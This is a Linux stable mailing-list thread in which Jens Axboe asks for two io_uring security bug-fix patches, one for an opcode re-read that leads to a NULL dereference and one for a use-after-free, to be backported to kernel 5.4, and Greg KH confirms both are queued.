Hi,
Below is a io_uring patch that I'd like to get into 5.4. There's no equiv 5.5 commit, because the resulting changes were a lot more invasive there to avoid re-reading important sqe fields. But the reporter has also tested this one and verifies it fixes his issue. Can we get this queued up for 5.4?
commit 8cfecb9a5d7b2aff34547652adc5bb00a8da5fac Author: Jens Axboe axboe@kernel.dk Date: Wed Aug 5 12:30:36 2020 -0600
io_uring: prevent re-read of sqe->opcode
Liu reports that he can trigger a NULL pointer dereference with IORING_OP_SENDMSG, by changing the sqe->opcode after we've validated that the previous opcode didn't need a file and didn't assign one.
Ensure we validate and read the opcode only once.
Reported-by: Liu Yong pkfxxxing@gmail.com Tested-by: Liu Yong pkfxxxing@gmail.com Signed-off-by: Jens Axboe axboe@kernel.dk
diff --git a/fs/io_uring.c b/fs/io_uring.c index e0200406765c..8bb5e19b7c3c 100644 --- a/fs/io_uring.c +++ b/fs/io_uring.c @@ -279,6 +279,7 @@ struct sqe_submit { bool has_user; bool needs_lock; bool needs_fixed_file; + u8 opcode; };
/* @@ -505,7 +506,7 @@ static inline void io_queue_async_work(struct io_ring_ctx *ctx, int rw = 0;
if (req->submit.sqe) { - switch (req->submit.sqe->opcode) { + switch (req->submit.opcode) { case IORING_OP_WRITEV: case IORING_OP_WRITE_FIXED: rw = !(req->rw.ki_flags & IOCB_DIRECT); @@ -1254,23 +1255,15 @@ static int io_import_fixed(struct io_ring_ctx *ctx, int rw, }
static ssize_t io_import_iovec(struct io_ring_ctx *ctx, int rw, - const struct sqe_submit *s, struct iovec **iovec, + struct io_kiocb *req, struct iovec **iovec, struct iov_iter *iter) { - const struct io_uring_sqe *sqe = s->sqe; + const struct io_uring_sqe *sqe = req->submit.sqe; void __user *buf = u64_to_user_ptr(READ_ONCE(sqe->addr)); size_t sqe_len = READ_ONCE(sqe->len); u8 opcode;
- /* - * We're reading ->opcode for the second time, but the first read - * doesn't care whether it's _FIXED or not, so it doesn't matter - * whether ->opcode changes concurrently. The first read does care - * about whether it is a READ or a WRITE, so we don't trust this read - * for that purpose and instead let the caller pass in the read/write - * flag. - */ - opcode = READ_ONCE(sqe->opcode); + opcode = req->submit.opcode; if (opcode == IORING_OP_READ_FIXED || opcode == IORING_OP_WRITE_FIXED) { ssize_t ret = io_import_fixed(ctx, rw, sqe, iter); @@ -1278,7 +1271,7 @@ static ssize_t io_import_iovec(struct io_ring_ctx *ctx, int rw, return ret; }
- if (!s->has_user) + if (!req->submit.has_user) return -EFAULT;
#ifdef CONFIG_COMPAT @@ -1425,7 +1418,7 @@ static int io_read(struct io_kiocb *req, const struct sqe_submit *s, if (unlikely(!(file->f_mode & FMODE_READ))) return -EBADF;
- ret = io_import_iovec(req->ctx, READ, s, &iovec, &iter); + ret = io_import_iovec(req->ctx, READ, req, &iovec, &iter); if (ret < 0) return ret;
@@ -1490,7 +1483,7 @@ static int io_write(struct io_kiocb *req, const struct sqe_submit *s, if (unlikely(!(file->f_mode & FMODE_WRITE))) return -EBADF;
- ret = io_import_iovec(req->ctx, WRITE, s, &iovec, &iter); + ret = io_import_iovec(req->ctx, WRITE, req, &iovec, &iter); if (ret < 0) return ret;
@@ -2109,15 +2102,14 @@ static int io_req_defer(struct io_ring_ctx *ctx, struct io_kiocb *req, static int __io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, const struct sqe_submit *s, bool force_nonblock) { - int ret, opcode; + int ret;
req->user_data = READ_ONCE(s->sqe->user_data);
if (unlikely(s->index >= ctx->sq_entries)) return -EINVAL;
- opcode = READ_ONCE(s->sqe->opcode); - switch (opcode) { + switch (req->submit.opcode) { case IORING_OP_NOP: ret = io_nop(req, req->user_data); break; @@ -2181,10 +2173,10 @@ static int __io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, return 0; }
-static struct async_list *io_async_list_from_sqe(struct io_ring_ctx *ctx, - const struct io_uring_sqe *sqe) +static struct async_list *io_async_list_from_req(struct io_ring_ctx *ctx, + struct io_kiocb *req) { - switch (sqe->opcode) { + switch (req->submit.opcode) { case IORING_OP_READV: case IORING_OP_READ_FIXED: return &ctx->pending_async[READ]; @@ -2196,12 +2188,10 @@ static struct async_list *io_async_list_from_sqe(struct io_ring_ctx *ctx, } }
-static inline bool io_sqe_needs_user(const struct io_uring_sqe *sqe) +static inline bool io_req_needs_user(struct io_kiocb *req) { - u8 opcode = READ_ONCE(sqe->opcode); - - return !(opcode == IORING_OP_READ_FIXED || - opcode == IORING_OP_WRITE_FIXED); + return !(req->submit.opcode == IORING_OP_READ_FIXED || + req->submit.opcode == IORING_OP_WRITE_FIXED); }
static void io_sq_wq_submit_work(struct work_struct *work) @@ -2217,7 +2207,7 @@ static void io_sq_wq_submit_work(struct work_struct *work) int ret;
old_cred = override_creds(ctx->creds); - async_list = io_async_list_from_sqe(ctx, req->submit.sqe); + async_list = io_async_list_from_req(ctx, req);
allow_kernel_signal(SIGINT); restart: @@ -2239,7 +2229,7 @@ static void io_sq_wq_submit_work(struct work_struct *work) }
ret = 0; - if (io_sqe_needs_user(sqe) && !cur_mm) { + if (io_req_needs_user(req) && !cur_mm) { if (!mmget_not_zero(ctx->sqo_mm)) { ret = -EFAULT; } else { @@ -2387,11 +2377,9 @@ static bool io_add_to_prev_work(struct async_list *list, struct io_kiocb *req) return ret; }
-static bool io_op_needs_file(const struct io_uring_sqe *sqe) +static bool io_op_needs_file(struct io_kiocb *req) { - int op = READ_ONCE(sqe->opcode); - - switch (op) { + switch (req->submit.opcode) { case IORING_OP_NOP: case IORING_OP_POLL_REMOVE: case IORING_OP_TIMEOUT: @@ -2419,7 +2407,7 @@ static int io_req_set_file(struct io_ring_ctx *ctx, const struct sqe_submit *s, */ req->sequence = s->sequence;
- if (!io_op_needs_file(s->sqe)) + if (!io_op_needs_file(req)) return 0;
if (flags & IOSQE_FIXED_FILE) { @@ -2460,7 +2448,7 @@ static int __io_queue_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
s->sqe = sqe_copy; memcpy(&req->submit, s, sizeof(*s)); - list = io_async_list_from_sqe(ctx, s->sqe); + list = io_async_list_from_req(ctx, req); if (!io_add_to_prev_work(list, req)) { if (list) atomic_inc(&list->cnt); @@ -2582,7 +2570,7 @@ static void io_submit_sqe(struct io_ring_ctx *ctx, struct sqe_submit *s, req->user_data = s->sqe->user_data;
#if defined(CONFIG_NET) - switch (READ_ONCE(s->sqe->opcode)) { + switch (req->submit.opcode) { case IORING_OP_SENDMSG: case IORING_OP_RECVMSG: spin_lock(¤t->fs->lock); @@ -2697,6 +2685,7 @@ static bool io_get_sqring(struct io_ring_ctx *ctx, struct sqe_submit *s) if (head < ctx->sq_entries) { s->index = head; s->sqe = &ctx->sq_sqes[head]; + s->opcode = READ_ONCE(s->sqe->opcode); s->sequence = ctx->cached_sq_head; ctx->cached_sq_head++; return true;
On 8/5/20 12:34 PM, Jens Axboe wrote:
Hi,
Below is a io_uring patch that I'd like to get into 5.4. There's no equiv 5.5 commit, because the resulting changes were a lot more invasive there to avoid re-reading important sqe fields. But the reporter has also tested this one and verifies it fixes his issue. Can we get this queued up for 5.4?
And on top of that, this one as well which is also only applicable to 5.4. Thanks!
commit 33757992d5627b986757fd70ff86d73f2bda0dac Author: Guoyu Huang hgy5945@gmail.com Date: Tue Aug 4 20:40:42 2020 -0700
io_uring: Fix use-after-free in io_sq_wq_submit_work()
when ctx->sqo_mm is zero, io_sq_wq_submit_work() frees 'req' without deleting it from 'task_list'. After that, 'req' is accessed in io_ring_ctx_wait_and_kill() which lead to a use-after-free.
Signed-off-by: Guoyu Huang hgy5945@gmail.com Signed-off-by: Jens Axboe axboe@kernel.dk
diff --git a/fs/io_uring.c b/fs/io_uring.c index 8bb5e19b7c3c..be3d595a607f 100644 --- a/fs/io_uring.c +++ b/fs/io_uring.c @@ -2232,6 +2232,7 @@ static void io_sq_wq_submit_work(struct work_struct *work) if (io_req_needs_user(req) && !cur_mm) { if (!mmget_not_zero(ctx->sqo_mm)) { ret = -EFAULT; + goto end_req; } else { cur_mm = ctx->sqo_mm; use_mm(cur_mm);
On Wed, Aug 05, 2020 at 01:10:25PM -0600, Jens Axboe wrote:
On 8/5/20 12:34 PM, Jens Axboe wrote:
Hi,
Below is a io_uring patch that I'd like to get into 5.4. There's no equiv 5.5 commit, because the resulting changes were a lot more invasive there to avoid re-reading important sqe fields. But the reporter has also tested this one and verifies it fixes his issue. Can we get this queued up for 5.4?
And on top of that, this one as well which is also only applicable to 5.4. Thanks!
Also queued up, thanks!
greg k-h
On 8/7/20 7:19 AM, Greg KH wrote:
On Wed, Aug 05, 2020 at 01:10:25PM -0600, Jens Axboe wrote:
On 8/5/20 12:34 PM, Jens Axboe wrote:
Hi,
Below is a io_uring patch that I'd like to get into 5.4. There's no equiv 5.5 commit, because the resulting changes were a lot more invasive there to avoid re-reading important sqe fields. But the reporter has also tested this one and verifies it fixes his issue. Can we get this queued up for 5.4?
And on top of that, this one as well which is also only applicable to 5.4. Thanks!
Also queued up, thanks!
Thanks, for both!
On Wed, Aug 05, 2020 at 12:34:09PM -0600, Jens Axboe wrote:
Hi,
Below is a io_uring patch that I'd like to get into 5.4. There's no equiv 5.5 commit, because the resulting changes were a lot more invasive there to avoid re-reading important sqe fields. But the reporter has also tested this one and verifies it fixes his issue. Can we get this queued up for 5.4?
commit 8cfecb9a5d7b2aff34547652adc5bb00a8da5fac Author: Jens Axboe axboe@kernel.dk Date: Wed Aug 5 12:30:36 2020 -0600
io_uring: prevent re-read of sqe->opcode
Liu reports that he can trigger a NULL pointer dereference with IORING_OP_SENDMSG, by changing the sqe->opcode after we've validated that the previous opcode didn't need a file and didn't assign one. Ensure we validate and read the opcode only once. Reported-by: Liu Yong pkfxxxing@gmail.com Tested-by: Liu Yong pkfxxxing@gmail.com Signed-off-by: Jens Axboe axboe@kernel.dk
Now queued up, thanks!
greg k-h
linux-stable-mirror@lists.linaro.org